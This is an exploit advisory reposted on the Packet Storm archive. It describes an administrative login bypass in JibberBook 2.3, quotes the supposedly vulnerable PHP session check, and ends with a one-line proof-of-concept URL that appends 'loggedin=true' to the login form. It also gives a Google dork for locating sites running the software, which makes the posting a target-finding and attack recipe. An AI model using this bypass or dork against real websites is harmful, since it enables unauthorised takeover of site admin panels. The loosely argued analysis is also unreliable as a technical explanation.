what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Jibberbook 2.3 Administrative Bypass

Jibberbook 2.3 Administrative Bypass
Posted May 7, 2012
Authored by L3b-r1'z

Jibberbook version 2.3 suffers from an administrative bypass vulnerability.

tags | exploit, bypass
SHA-256 | b5b53e60f590f445c7ae12ebaa132d6dde7e0ddd3bbcac6745422c617c736ba3

Jibberbook 2.3 Administrative Bypass

Change Mirror Download
#################################################
# Exploit Title : jibberbook Bypass Admin Vulnerability
#
# Author : IrIsT.Ir & Sec4Ever.com
#
# Discovered By : L3b-r1'z
#
# Home : http://IrIsT.Ir & http://Sec4Ever.com
#
# P Blob : http://L3b-r1z.com/
#
# Software Link : http://jibberbook.com/
#
# Security Risk : High
#
# Version : 2.3
#
# Tested on : win\XP
#
# Dork : allintext: "JibberBook created by chromasynthetic |
Powered by MooTools, HTML Purifier, and Akismet"
#
# 1) SCript
# 2) Info Vulnerabilty
# 3) P0c
#
#
#################################################
#
# 1) SCript:
# JibberBook allow the visitor to make comment or any thing like how
visitor like website :)
# or any msg for admin of site.
#
#
#################################################
#
# 2) Info Vulnerability :
# This exploit allow attacker to log into the admin panel with out write
username or password .
# Look Into The File index.php In jibberbook-2.3\admin :
#
# require_once('inc/secure.php');
# require_once('../inc/includes.php');
# includes(array('admin/actions/load.php',
'admin/actions/transformxml.php'));
#
# $_SESSION['referer'] = 'http://' . $_SERVER['HTTP_HOST'] .
$_SERVER['REQUEST_URI'];
# require_once('inc/header.php');
# ?>
# We have Require to File Named Secure , Lets Check it :) :
#
# session_start();
# if (!isset($_SESSION['admin']))
# {
# if (is_file(realpath('login_form.php'))) {
# $url = 'http://' . $_SERVER['HTTP_HOST'] .
dirname($_SERVER['REQUEST_URI'] . 'x') . '/login_form.php';
# } else {
# $url = 'http://' . $_SERVER['HTTP_HOST'] .
dirname(dirname($_SERVER['REQUEST_URI'] . 'x')) . '/login_form.php';
# }
# header("Location: $url");
# exit();
# } else {
# $loggedin = true;
# }
#
# The file don't have any secure here :P.
# Cz Look To Below Header , We Have else Loggedin = True, its mean if the
attacker not admin required to login_form.php
# else , Loggedin = true , Admin Redirect to Admin panel :).
#
#
#################################################
#
# 3) p0c :
#
# Site.Com/Admin/Login_form.php?loggedin=true
#
#################################################
#
#
# Special Thx To : Irist Team & Sec4Ever Team .
#
#################################################
#
#
# Greet'z : b0x, Virus-Ra3ch, Damane2011, Hacker-1420, The Injector,
N4ss1m, hacker-1420.
# Sec4ever, B07 M4S73R, Stalk3r, Hacker-Dz, Mr.XKILLeR, The Viper, Th3
Killer Dz.
# Over-X <3, And All My Friends.
#
#################################################

--
Proud To Be Lebanese :D

I Will Miss You My Friends : b0x, Virus-Ra3ch, Damane2011, Hacker-1420, The
Injector, N4ss1m, Sec4ever, B07 M4S73R, Stalk3r, Hacker-Dz, Mr.XKILLeR, The
Viper, Th3 Killer Dz, Over-X <3, And All My Friends.

Sec4ever.com.
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close